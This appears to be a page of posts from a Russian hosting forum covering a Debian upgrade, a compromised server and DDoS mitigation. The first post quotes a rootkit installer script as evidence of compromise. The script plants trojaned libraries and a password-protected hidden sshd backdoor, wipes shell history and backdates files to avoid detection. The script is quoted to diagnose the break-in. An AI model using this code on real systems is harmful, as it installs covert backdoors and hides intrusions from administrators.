Raistlin

Raistlin
hostace.ru
tw: HostAce
Рейтинг
247
Регистрация
01.02.2010
обновление до debian 5

ну чтобы менять, надо снять аттрибут i точно так же. А вообще...

C вашей системой произошло описанное ниже, или что-то близкое. Только реформат, с последующим аудитом безопасности сайтов.

# checking if we got needed libs and filez

if [ ! -f /lib/libproc.a ]; then
mv lib/libproc.a /lib/
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv lib/libproc.so.2.0.6 /lib/
fi

/sbin/ldconfig >/dev/null 2>&1

#if [ -f /lib/libncurses.so.5 ]; then
# echo ""
#else
# ln -s /lib/libncurses.so.4 /lib/libncurses.so.5 2>/dev/null
#fi

if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi

if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi

if test -n "$1" ; then
echo "${DCYN}[${WHI}sh${DCYN}]# Using Password : ${WHI}$1 ${BLU} ${RES}"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} No Password Specified, using default - $DEFPASS ${BLU} ${RES}"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n "$2" ; then
echo "${DCYN}[${WHI}sh${DCYN}]# Using ssh-port : ${WHI}$2 ${RES}"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/conf/hosts.h
echo "4 $2" >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo "${DCYN}[${WHI}sh${DCYN}]# No ssh-port Specified, using default - $DEFPORT ${BLU} ${RES}"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/conf/hosts.h
echo "4 $2" >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi

if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/* /usr/include/
обновление до debian 5
Logger:
интересно как сменить для php с /usr/local/bin/php на /usr/bin/php

myhand ответил на этот вопрос (переменные окружения). Однако, еще myhand высказал предположение, что ваша система скомпрометирована и rkhunter отчасти подтвердил это предположение...

Покажите /etc/sh.conf для начала, если все же собираетесь обойтись без реинсталла сервера.

обновление до debian 5
myhand:
apt-get dist-upgrade делают после apt-get upgrade.

Чоооо?

http://www.debian.org/releases/lenny/i386/release-notes/ch-upgrading.ru.html#backup

Вот отсюда можно читать.

Во-первых, нужно обновить список доступных пакетов нового выпуска. Это делается командой:

# aptitude update
Запуск команды в первый раз для новых источников приведёт к выводу нескольких предупреждений о доступности источников. Эти предупреждения безобидны и больше не появятся при последующих запусках команды.

4.5.3. Проверка доступного пространства для обновления

Перед обновлением всей системы, как описано в Раздел 4.5.7, «Обновление остальной системы», убедитесь, что у вас достаточно места на диске. Сначала все нужные для установки пакеты скачиваются из сети и сохраняются в /var/cache/apt/archives (а на время скачивания, в подкаталог partial/), поэтому вы должны проверить место на разделе, который содержит /var/, так как туда будут временно записаны загруженные пакеты для установки. После загрузки вам, вероятно, понадобится больше места в других разделах файловой системы для установки обновляемых пакетов (скорее всего, они стали больше) и новых пакетов, которые будут установлены из-за обновлений. Если в системе не будет достаточного места, то в конечном счёте это приведёт к неполному обновлению, что позднее бывает сложно исправить.

И aptitude, и apt отображают подробную информацию о количестве требуемого места для установки. Перед выполнением обновления вы можете увидеть размер необходимого места, запустив:

# aptitude -y -s -f --with-recommends dist-upgrade
[ ... ]
XXX пакетов обновлено, XXX установлено новых, XXX пакетов отмечено для удаления и XXX пакетов не обновлено.
Необходимо получить xx.xMБ/yyyMБ архивов. После распаковки будет использовано AAAMБ.
Будет выполнена загрузка/установка/удаление пакетов.

Raistlin добавил 03.08.2011 в 06:15

myhand:
Это точно бяка

Согласен. Но я бы еще поглядел на его содержимое. авось пригодится когда ;).

Logger:
lsattr /usr/bin/ssh - не помог

А чем он поможет? Он вам покажет атрибуты, которые надо бы, скорее всего, снять.

Raistlin добавил 03.08.2011 в 06:20

Upgrading with apt
Please note that using apt-get is not recommended for the upgrade from etch to lenny. If you do not have aptitude installed you are recommended to install it first.

If you want to perform the upgrade with apt or if the upgrade with aptitude failed and you want to try the upgrade with apt' dependency chain resolution algorithm, you should run:

# apt-get install apt
Note that you will have to adapt other aptitude commands to use apt-get instead.

Оттуда же. Но это уже, собсна, флуд...

Нужен хостинг (ВПС, Дедик) с защитой от ДДОС на хорошем уровне

kostich, Валидный лился. Пакетики все разные лились.

kostich:
какой смысл лимитировать сины с каких-то конкретных ip адресов?

Ну дело в том, что в данном случае лились сины в больших количествах с иных ботов. всех найти и побанить не получалось быстро, поэтому вышел из положения так.

Кстати, сейчас проанализировал свою переписку с ДЦ по другой локации и другой аналогичной ситуевине. Я им писал, что с их сервера на меня льется син, они меня отправили к партнеру, через которого я с ними работаю, мол трафик идет вредоносный от него (!). Я вообще, честно, жутко удивился такому поведению. Но там всего два айпишника и лились с них пакеты примерно 2-3 часа. Кстати, интересная закономерность - раз в 2-3 часа ботнет ПОЛНОСТЬЮ обновляется....

Нужна телематическая лицензия. Накидайте предложений.

hostingconsult.ru - возможно, здесь вам будет проще и быстрее.

Хостинг для самих скачиваемых файлов на торенте (не тех, что для конекта, а качаемых)

donbaton, Какой канал нужен? Лучше всего взять VDS и поставить на нее что-то вроде torrentflux.

Нужен хостинг (ВПС, Дедик) с защитой от ДДОС на хорошем уровне

kostich, Не сам скрипт, а пример. Это ограничение числа поступления пакетов в секунду при помощи tc, iptables в данном случае используется для маркировки пакетов. Помимо скрипта я тюнил ядро при помощи sysctl, ну и руками тоже работал. Т.е. сам то по себе какой-то скрипт тут хрен поможет, там в скрипте дан простенький пример, сам по себе он как раз и делает ограничение до 3-х пакетов в секунду с одного IP. Ну вроде как объяснил :). Работало это дело на VDS с 2 гигами рамы и 4 ядрами выделенными. Нагрузки на сам VDS небыло, веб-сервер в общем-то тоже вел себя вполне корректно, единственный минус = жуткие тормоза iptables. Там параллельно http-флуд еще был, парсинг логов отрабатывал на ура, но вот незадача - айпишники банились под конец почти через минуту после детекта (особливо заметно стало, когда их число стало расти).

Выбор vps

Ну я приблизительно так и понял... Чтобы загасить вышеозначенную конфигурацию, в общем, у среднего ддосера ресурсов вполне достаточно может оказаться - есть еще понятие как загруженность ноды, а так же каналы и сетевое оборудование. Ну, и, желание ДЦ помочь с этим вопросом...

Выбор vps
anemak:
Вашу конфигурацию загрузят на 100%

5*2000 MHz, 16 Gb RAM, 400 Gb HDD, Xen VDS. 10200 руб/мес.

А если серьезно - то что именно вы понимаете под DDoS? Защита от него бывает довольно таки разной. Как и сам DDoS тоже.

Нужен хостинг (ВПС, Дедик) с защитой от ДДОС на хорошем уровне

kostich, Понимаю :), но с фиксированным win мне не прилетало пока еще, могу только кусочек netflow выложить или кусочек tcpdump. В моем случае пока помог скрипт, написанный в Linux Advanced Routing HOWTO ch. 15.2 :)

1... 107108109110111112113114115 ...468
Всего: 4674